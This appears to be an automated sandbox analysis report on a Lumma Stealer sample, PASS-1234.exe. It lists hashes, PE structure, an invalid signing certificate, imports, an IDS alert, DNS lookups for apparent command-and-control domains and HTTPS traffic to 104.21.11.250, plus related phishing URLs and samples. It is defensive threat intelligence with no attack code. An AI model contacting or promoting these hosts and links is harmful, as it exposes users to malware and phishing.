        https://www.sigtn.com/utils/emt.cfm?client_id=9195153&campaign_id=73466&link=aHR0cHM6Ly9saW5rLm1haWwuYmVlaGlpdi5jb20vbHMvY2xpY2s/dXBuPXUwMDEucklvcWRaR1R1SGJzNzQ0S21jWTQzbm9GN25FNXlXdTZFcUlEQ1JQVW5LVlRsVDF5N0p0RTVORGVVSmxOU254Uk82V2lWVzB6akF4aVNnRXQ4S0dzZUdDb3N4OE9CV0tIQ1VyMmlaRXQ0LTJCM2EtMkZuWXhLOHNYNW1IZ0ZPZFd1VHpnUmNyMHdMYk52c0NadXktMkZiSXRoVDI4bi0yRjdCUy0yQmVINGxDRVExVTQxQU5xSS0zRFhBa0FfdWpTUjJaZ1VvcFZ3R0Y1eWNMcm5nS0Y1andZVnZoMHVzbGExV2Z5ZUs2QXJvYzFDOXFaY3NKZHlBVHNhVnFnZmxkNjlSOE1FQ3J6dHdtVUw5QkliUXRiM1VjUEwxanplbGNyNG1jZGFhdlZNZFE0ejA0ZHFqRC0yRkR4RVlVV1lLM3BjNTBsREpndVd5Z0NZMEZ2LTJGdG9kUkpjSzNjRlYwcDdMYS0yQlh1NjRveEtqVkpFUkV3WGJSekN0dTlZazJBSmgwQVVNeUxiOTVXWlBiTmxOQjlmTXRhbm41aDY2eDByMm5nR2k5QmJkLTJCdWd1Ync2Z092blJheXlKLTJGYXB3eHBSSHpxZHZER21pREhpR09kemxvQVRJQWkxMWR5ZWhpazY3NDRzQ2E3dzl0MWZqU2JvTWpXd1dvdXlVaDJPd0VyLTJCOHJDZTB1VjF6clJDTi0yQjh6Z2R4Y1JibkZ1a3JtNGVJbU5WQUJnSFMtMkZ1S2RrUDdrZkUxUm9PWlVGdWU3bzZkLTJGY3FpMUx2VXVpbW9VbmxzMjRseXRVQzNQdUpiOVlDZ0Zoc29LRlZOMUxvZXloOFFGTERUaEN4VjE5UC0yRmxCWTRpZURUI2V4cGVkaXRpbmdAYmVpbi5jb20=Get hashmaliciousUnknownBrowse
        • 162.247.243.29
        SecuriteInfo.com.PUA.Biztree.1653.24897.exeGet hashmaliciousUnknownBrowse
        • 1.1.1.1
        SecuriteInfo.com.PUA.Biztree.1653.24897.exeGet hashmaliciousUnknownBrowse
        • 1.1.1.1
        file.exeGet hashmaliciousLummaCBrowse
        • 104.21.15.37
        https://modemultiple.pages.dev/Get hashmaliciousUnknownBrowse
        • 104.17.25.14
        https://private.document-projeect.workers.dev/Get hashmaliciousHTMLPhisherBrowse
        • 172.64.154.107
        https://document.propoosale-team.workers.dev/Get hashmaliciousHTMLPhisherBrowse
        • 172.64.154.107
        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
        • 104.26.4.15
        https://pkp.jzw.mybluehost.me/wp-content/d/d/Get hashmaliciousUnknownBrowse
        • 104.18.11.207
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
        • 104.21.11.250
        file.exeGet hashmaliciousLummaCBrowse
        • 104.21.11.250
        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
        • 104.21.11.250
        LwnI84BBtb.exeGet hashmaliciousLummaCBrowse
        • 104.21.11.250
        SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
        • 104.21.11.250
        file.exeGet hashmaliciousLummaCBrowse
        • 104.21.11.250
        file.exeGet hashmaliciousRisePro StealerBrowse
        • 104.21.11.250
        pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
        • 104.21.11.250
        file.exeGet hashmaliciousLummaCBrowse
        • 104.21.11.250
        hta.htaGet hashmaliciousUnknownBrowse
        • 104.21.11.250
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):6.529944218392288
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:PASS-1234.exe
        File size:1'229'424 bytes
        MD5:91a6507a51ddcf98f542e89c58b9a17e
        SHA1:870a96273698fc67cf145a7601fc3892671eea22
        SHA256:aca438e378d0fd7abdb1fc1f7cc9acdc279dbd399fda98f8078a99a4a24e537a
        SHA512:cdc5aa3b28e69e119c1415ce760d6cd6633eb5ab98834d609ec198b212614ad49d1f9e5c11f44507522eaf7b1bf39d5d9d20064df5259a358951e15f05154e48
        SSDEEP:24576:zkeQ/Joxh1oVZM8YWmwZ+Y3DkUU78T0KPTXBsn1F9/GAApP1aqNt+:Xxh1oVZMY31snDNrABYqS
        TLSH:DC45CF2179C49072EDE720B746ECBA3682ADE4B0471516CB07DC5BEED7606C27F32686
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3.h.0...3.h.6...3.h.7...3.y77...3.y70...3.h.2...3...2...3.y76...3.H46...3.H4....3.H41...3.Rich..3.........PE..L..
        Icon Hash:90cececece8e8eb0
        Entrypoint:0x4011d1
        Entrypoint Section:.text
        Digitally signed:true
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x6624AD91 [Sun Apr 21 06:09:21 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:6c2d283aa2105be58188e49b58a6bdd2
        Signature Valid:false
        Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
        Signature Validation Error:The digital signature of the object did not verify
        Error Number:-2146869232
        Not Before, Not After
        • 08/10/2020 01:00:00 12/10/2023 13:00:00
        Subject Chain
        • CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
        Version:3
        Thumbprint MD5:332CDC164B1324C3FF3F64E228C5FFFC
        Thumbprint SHA-1:CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
        Thumbprint SHA-256:531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
        Serial:0C9838F673F9B1CCE395CFAB2B6684E4
        Instruction
        jmp 00007F0CCCC30345h
        jmp 00007F0CCCC55D36h
        jmp 00007F0CCCC2F530h
        jmp 00007F0CCCC388D0h
        jmp 00007F0CCCC21EDBh
        jmp 00007F0CCCC0BE4Ch
        jmp 00007F0CCCC92C81h
        jmp 00007F0CCCC224BAh
        jmp 00007F0CCCC56AB4h
        jmp 00007F0CCCC97B8Bh
        jmp 00007F0CCCC0720Ah
        jmp 00007F0CCCC31480h
        jmp 00007F0CCCC41402h
        jmp 00007F0CCCC1A5B4h
        jmp 00007F0CCCC02989h
        jmp 00007F0CCCC44CAEh
        jmp 00007F0CCCC095A5h
        jmp 00007F0CCCC059C5h
        jmp 00007F0CCCC826EFh
        jmp 00007F0CCCC02445h
        jmp 00007F0CCCC51257h
        jmp 00007F0CCCC6DBDFh
        jmp 00007F0CCCC1E997h
        jmp 00007F0CCCC5F240h
        jmp 00007F0CCCC2ACC9h
        jmp 00007F0CCCC3949Ah
        jmp 00007F0CCCC02DD1h
        jmp 00007F0CCCC699EEh
        jmp 00007F0CCCC90723h
        jmp 00007F0CCCC1836Dh
        jmp 00007F0CCCC32DFCh
        jmp 00007F0CCCC44C74h
        jmp 00007F0CCCC8D72Ch
        jmp 00007F0CCCC7C911h
        jmp 00007F0CCCC79A83h
        jmp 00007F0CCCC1AB01h
        jmp 00007F0CCCC393B7h
        jmp 00007F0CCCC5EA39h
        jmp 00007F0CCCC5EA20h
        jmp 00007F0CCCC2F797h
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x12620c0x3c.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1280000x595.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x129c000x2670.reloc
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1290000x4810.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0xbec500x38.rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xbeb680x40.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x1260000x20c.idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000xb07980xb0800bc036925ff26378c4f32254f050aca9bFalse0.3322110702903683data5.8344330209166975IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0xb20000x14e9c0x1500012a8026f7cb82d532eda30aedd92a396False0.285888671875data3.7090415644290298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0xc70000x5ed000x5d200d0cef833d463a24fe9297b6d7daff38aFalse0.8175597734899329data7.237379033791951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata0x1260000xce40xe003c03556465a808a15dfebc0547c07175False0.33677455357142855data4.3866801583830926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .00cfg0x1270000x10e0x200538eede3a8efee153c6ea7cecee5ea41False0.03515625data0.11055713125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .rsrc0x1280000x5950x600f56dc87fbf96485eb492de1e12eca98aFalse0.4283854166666667data3.988375491483662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x1290000x563b0x5800d7343ca5ad0f878c7fdd0b0d9d9dd7bcFalse0.6222478693181818data5.962106940053917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_VERSION0x1280a00x378dataEnglishUnited States0.44144144144144143
        RT_MANIFEST0x1284180x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
        DLLImport
        ADVAPI32.dllRegDisablePredefinedCache
        KERNEL32.dllCloseHandle, WaitForSingleObjectEx, CreateRemoteThread, VirtualProtect, FormatMessageA, LocalFree, GetLocaleInfoEx, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetCurrentThread, HeapAlloc, HeapFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, SetConsoleCtrlHandler, HeapReAlloc, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        04/21/24-09:04:55.909755UDP2049958ET TROJAN Lumma Stealer Related Domain in DNS Lookup (sideindexfollowragelrew .pw)5527853192.168.2.41.1.1.1
        TimestampSource PortDest PortSource IPDest IP
        Apr 21, 2024 09:04:56.191524982 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.191567898 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.191637039 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.195146084 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.195162058 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.429863930 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.430047989 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.431646109 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.431653976 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.432189941 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.477598906 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.480608940 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.480634928 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.480979919 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.957777023 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.958048105 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.958132029 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.960956097 CEST49742443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.960972071 CEST44349742104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.965198994 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.965313911 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:56.965413094 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.965858936 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:56.965939999 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.192219019 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.192316055 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.205641985 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.205719948 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.206602097 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.216793060 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.216794014 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.217015982 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734230995 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734391928 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734498024 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.734527111 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734636068 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734714031 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.734724998 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734872103 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.734925985 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.734935999 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735085011 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735138893 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.735148907 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735296965 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735351086 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.735359907 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735505104 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735558033 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.735567093 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735759020 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735816956 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.735867977 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.735896111 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.735922098 CEST49743443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.735935926 CEST44349743104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.771289110 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.771368027 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.771492004 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.771807909 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:57.771843910 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.998644114 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:57.999130964 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.000071049 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.000149965 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.001127958 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.002157927 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.002284050 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.002402067 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.002496004 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.002574921 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.546812057 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.547041893 CEST44349744104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.547328949 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.547329903 CEST49744443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.570653915 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.570699930 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.570775032 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.571043015 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.571053982 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.801445961 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.801547050 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.802778959 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.802791119 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.803921938 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:58.805057049 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.805164099 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:58.805213928 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.338597059 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.338867903 CEST44349745104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.338931084 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.338973045 CEST49745443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.400651932 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.400732994 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.400851965 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.401273966 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.401354074 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.626473904 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.626676083 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.627823114 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.627872944 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.628396034 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.629601002 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.629764080 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.629833937 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:04:59.629925966 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:04:59.629944086 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.182255030 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.182543993 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.182701111 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.183147907 CEST49746443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.183207989 CEST44349746104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.248697042 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.248776913 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.248881102 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.249275923 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.249358892 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.473462105 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.473781109 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.474813938 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.474865913 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.475442886 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.476694107 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.476775885 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.476852894 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.984888077 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.985186100 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:00.985420942 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:00.985420942 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.001167059 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.001204967 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.001272917 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.001543999 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.001557112 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.228846073 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.228920937 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.230165005 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.230174065 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.231183052 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.232353926 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.232439995 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.232601881 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.290359020 CEST49747443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:01.290420055 CEST44349747104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.746011019 CEST44349748104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:01.746225119 CEST49748443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.107943058 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.108036041 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.108136892 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.108413935 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.108443975 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.335706949 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.335777998 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.338285923 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.338305950 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.338799000 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.340133905 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.340843916 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.340892076 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.341037035 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.341084003 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.342442989 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.342498064 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.342684984 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.342731953 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.342909098 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.342957020 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.343189955 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.343230009 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.343257904 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.343298912 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.343381882 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.343415976 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.343451023 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.343471050 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.343524933 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.343631983 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.384152889 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.384452105 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.384493113 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.384538889 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.384572029 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:02.384643078 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:02.384675980 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:04.512609959 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:04.512860060 CEST44349749104.21.11.250192.168.2.4
        Apr 21, 2024 09:05:04.512892962 CEST49749443192.168.2.4104.21.11.250
        Apr 21, 2024 09:05:04.512953043 CEST49749443192.168.2.4104.21.11.250
        TimestampSource PortDest PortSource IPDest IP
        Apr 21, 2024 09:04:55.909754992 CEST5527853192.168.2.41.1.1.1
        Apr 21, 2024 09:04:56.034226894 CEST53552781.1.1.1192.168.2.4
        Apr 21, 2024 09:04:56.035650015 CEST5010453192.168.2.41.1.1.1
        Apr 21, 2024 09:04:56.186405897 CEST53501041.1.1.1192.168.2.4
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Apr 21, 2024 09:04:55.909754992 CEST192.168.2.41.1.1.10xf7c6Standard query (0)sideindexfollowragelrew.pwA (IP address)IN (0x0001)false
        Apr 21, 2024 09:04:56.035650015 CEST192.168.2.41.1.1.10x6dd0Standard query (0)productivelookewr.shopA (IP address)IN (0x0001)false
